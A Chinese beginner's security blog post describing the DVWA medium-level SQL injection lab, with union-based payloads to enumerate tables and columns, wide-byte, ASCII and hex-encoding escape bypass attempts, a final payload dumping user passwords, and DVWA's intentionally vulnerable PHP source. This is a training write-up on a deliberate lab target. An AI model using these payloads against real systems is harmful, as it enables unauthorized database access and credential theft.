从零开始学安全--第4天

最新推荐文章于 2022-06-12 15:18:44 发布
最新推荐文章于 2022-06-12 15:18:44 发布
阅读量107 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_veget_dog/article/details/115128340
版权

DVWA SQL注入中级

使用burp抓包发现抓不了127.0.0.1的包,配置好代理后再搜索about:,把本地的代理打开,就可以抓到包了

在这里插入图片描述

爆库名

中级的sql注入是设置好的post表单提交,在网页上没有输入的地方,所以我们用burp抓包来构造payload
id=1 union select database(),version()#

在这里插入图片描述

爆表名

构造payload查询数据库:id=1 union select table_name,NULL from information_schema.tables where table_schema=“dvwa”# 报错了 说的是分号被转义掉了
在这里插入图片描述
我们来看一下源码:
(在右下角点击View Sources)

 <?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

mysqli_real_escape_string()这个函数对分号进行了\ 转义,要转义的字符串。编码的字符是 NUL(ASCII
0)、\n、\r、\、’、" 和 Control-Z。

这里可以构造用database()来查询:
payload: id=1 union select table_name,NULL from information_schema.tables where table_schema=database()#
在这里插入图片描述

爆字段
表名出来以后我们接着是爆字段,但是这里分号是用不了的,就不能直接查找我们想要的users表的字段,需要构造payload来绕过转义。
在网上找个几种常见的绕过方法:

1.宽字节注入
用%df
以单引号’为例,它被转义为’,我们的目标是去掉反斜杠,将’逃逸出来。现在我们不输入’,而是输入%df’,被转义后它变成:%df’,也相当于%df%5c%27(%5c表示反斜杠\ ),之后在数据库查询前由于使用了GBK多字节编码,%df%5c会gbk编码转换成为汉字"運",从而使得%27,也就是单引号逃逸。
payload:id=1 union select group_concat(column_name),NULL from information_schema.columns where table_name=%df'users %df'#
还是不行被转义掉了
在这里插入图片描述
2.用ASCII()绕过
ASCII(39)=’ 来进行构造,但是还是不行,我觉得可能是我的语句有问题
payload:id=1 union select group_concat(column_name),NULL from information_schema.columns where table_name=ASCII(39)users ASCII(39)#
在这里插入图片描述
3.用16进制绕过
前面两种方法不行,困扰了我一天,最后参考一篇博文找到了,16进制转换是用代码来实现的,但是现在我还不懂是怎么转换的
payload:id=1 and 1=2 union select group_concat(column_name),NULL from information_schema.columns where table_name=0x7573657273#
在这里插入图片描述

爆用户

最后爆出用户账号密码就很简单了
payload:id=1 and 1=2 union select user,password from users #
在这里插入图片描述

参考博文链接:https://blog.csdn.net/Cai1010110/article/details/102734879?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.control&dist_request_id=1328689.9912.16165744645274655&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.control

Little_veget_dog
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从零开始学习CANoe(一)—— 新建工程
蚂蚁小兵
10-23 3万+
从零开始学习CANoe (一)—— 新建工程、 这个系列会包含各种CANoe/CAPL的相关知识 包括dbc的设计、panel的设计、trace分析,系统环境变量、CAPL脚本编写等
CentOS7 - 从零开始学习 推荐新手入门
serendipity_cat的博客
01-20 9901
CentOS7 学习指南一、基础知识Shell查看内部命令命令行格式控制台的辅助操作获得命令帮助的方法二、常用指令①PWD 查看当前的工作目录②CD 切换工作目录相对路径相对路径的表示形式绝对路径③ls 列表显示目录内容④alias 设置别名⑤mkdir 创建新目录 一、基础知识 Shell Linux系统中运行的一种特殊程序 在用户和内核之间之间充当“翻译官” 用户登陆Linux系统时,自动加载一个Shell程序 Bash是Linux系统中默认使用的Shell程序 查看内部命令 help enable
从零开始学安全(一)●安全了解
weixin_30315905的博客
03-08 109
信息安全 信息安全主要包括以下五方面的内容,即需保证信息的保密性、真实性、完整性、未授权拷贝和所寄生系统的安全性。信息安全本身包括的范围很大,其中包括如何防范商业企业机密泄露、防范青少年对不良信息的浏览、个人信息的泄露等。网络环境下的信息安全体系是保证信息安全的关键,包括计算机安全操作系统、各种安全协议、安全机制(数字签名、消息认证、数据加密等),直至安全系统,如UniNAC、DLP等...
从零学起-----通识篇06 https
qq_63622741的博客
04-10 4410
一、学习目标 了解HTTPS中所涉及到的技术及作用 了解SSL/TLS协议的技术机制及意义 理解加密解密技术在HTTPS中的重要作用 理解证书在HTTPS中的重要作用 二、学习背景 HTTPS(全称是Hyper Text Transfer Protocol over SecureSocket Layer)是身披SSL/TLS外壳的HTTP。它在HTTP之上利用SSL/TLS建立安全的信道,加密数据传输。它被广泛用于互联网上安全敏感的通讯,例如电商、支付等应用。 三、学习内容 1、加密
从零开始搭建Ubuntu CTF-pwn环境
CoLin的pwn小屋
06-12 1万+
ctf pwn环境搭建(持续更新)
从零开始学习 kali-渗透 7月27日
qq_42184699的博客
07-27 9127
端口扫描 nmap -sS 目标ip Arp 内网断网 Arpspoof -i 网卡 -t 目标ip 网关 获取网卡/网关 ifconfig 获取内网ip fping -asg 192.168.1.0/24 Arp 欺骗 echo 写命令,是不会有回显的 ehco 1 &gt;proc/sys/net/ipv4/ip_forward # 进行IP流量转发 目标 --》 我的网卡 --》网关 dr...
从零开始学习CTF——CTF是什么
洛柒尘的博客
06-03 5万+
前言: 从2019年10月开始接触CTF,学习了sql注入、文件包含等web知识点,但都是只知道知识点却实用不上,后来在刷CTF题才发现知识点的使用方法,知道在哪里使用,哪里容易出漏洞,可是在挖src漏洞中还是很迷漫,学了快一年还是没挖过一条src漏洞。这一系列是把自己学习的CTF的过程详细写出来,方便大家学习时可以参考。 一、CTF简介 简介 中文一般译作夺旗赛(对大部分新手也可以叫签到赛),在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式 CTF起源于1996年DEFCON全球黑客
3. Spring Boot 从零开始学习
menergy
03-22 1573
1. Spring 的生态圈 Spring 官网地址:Spring | Homehttps://spring.io/ 进入官网首页,可以看到Spring能做什么: 1. Microservices: 微服务开发。把大型应用拆分成一个个微小的功能模块,每一个微小的功能模块就是一个微服务。 2. Reactive: 响应式编程。基于异步非阻塞的方式, 整个应用之间构建异步数据流的方式,异步数据流运行占用少量的服务器线程资源(少量的CPU,少量的内存资源),从而构建一个高吞吐量的应用。 3. C
Redis 运维 - 从零开始学习
serendipity_cat的博客
05-07 3242
Redis 运维 - 从零开始学习一、Redis简介Redis 的优点二、Redis 与 Memcached 的区别三、Redis部署1. 下载编译及安装2. 配置环境 一、Redis简介 Redis是一个基于C语言为底层代码开发的开源SQL数据库,Redis基于内存运行并持久化,采用key-value(键值对)的存储形式,是目前分布式架构中不可或缺的一环 Redis 的优点 具有极高的数据读写速度:数据读取的速度最高可达到 110000次/s,数据写入速度最高可达到 81000次/s 支持丰富的数据类型
从零开始学习Linux笔记
热门推荐
yy150122的博客
05-15 8万+
从零开始学习Linux,记录笔记,担心自己以后会忘,也供大家茶余饭后,闲来无事看看,自己的理解只能到这,也希望大家可以指出我的错误 让我可以有一点点进步,以后会一直更新
SQL Server 2012从零开始学培训视频和PPT.rar
04-24
第4章Transact-SQL语言基础.ppt 第5章轻松掌握Transact-SQL语句.ppt 第6章认识函数.ppt 第7章Transact-SQL查询.ppt 第8章数据的更新.ppt 第9章规则、默认和完整性约束ppt 第10章创建和使用索引l.ppt 第11章事务和锁....
从零开始学习软件漏洞挖掘系列教程第四篇:绕过GS机制1
08-03
1实验简介实验所属系列: 系统安全实验对象: 本科/专科信息安全专业相关课程及专业: 计算机网络实验时数(学分):2 学时实验类别: 实践实验类2 实验目的通过
从零开始学电路基础
09-03
电路基础学习的好资料 ...第四章 电路基本分析方法和重要定理 第五章 磁场与磁路基础知识 第六章 交流电路 第七章 三相交流电路与安全用电 第八章 互感和变压器 第九章 电路的过渡过程 第十章 Edison 软件应用
数据库基础学习从零开始全面分析数据库 初学者的最佳选择
08-03
第4章_SQL_Server_数据库系统_V08_2 第5章-1_结构化查询语言SQL_V08_2 第5章-2_结构化查询语言SQL_V08_2 第6章_视图、存储过程和自定义函数_V08_2 第7章_关系数据库规范化理论_V08_2 第8章_数据库设计_V08_2 第9章_...
从零开始学电路基础 part1
02-24
从零开始学电子技术丛书 国防工业出版社 刘建清主编 注重定性和概念,注重基础知识与实践,并配合计算机仿真软件的仿真实验。 目录 第一章 电路与电场基础知识 第二章 电路基本定律 第三章 电路的等效变换 第四章 ...
基于TC72(SPI接口)温度传感器、STM32F103C8T6、LCD1602、FREERTOS的温度采集proteus仿真
05-21
spi
ehcache-core-2.6.9.jar
05-21
javaee/javaweb常用jar包,亲测可用,导入到java工程中即可使用
netty-transport-native-unix-common-4.1.51.Final.jar
05-21
javaEE javaweb常用jar包 , 亲测可用,下载后导入到java工程中使用。
node-v6.14.4-headers.tar.xz
最新发布
05-21
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
从零开始的U-net入门
04-04
以下是从零开始学习U-net的步骤: 1. 了解U-net的基本架构 U-net主要由编码器和解码器两部分组成。编码器部分可以将输入图像转换为低维特征表示,而解码器部分可以将这些特征重构成与原始图像相同大小的分割结果。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值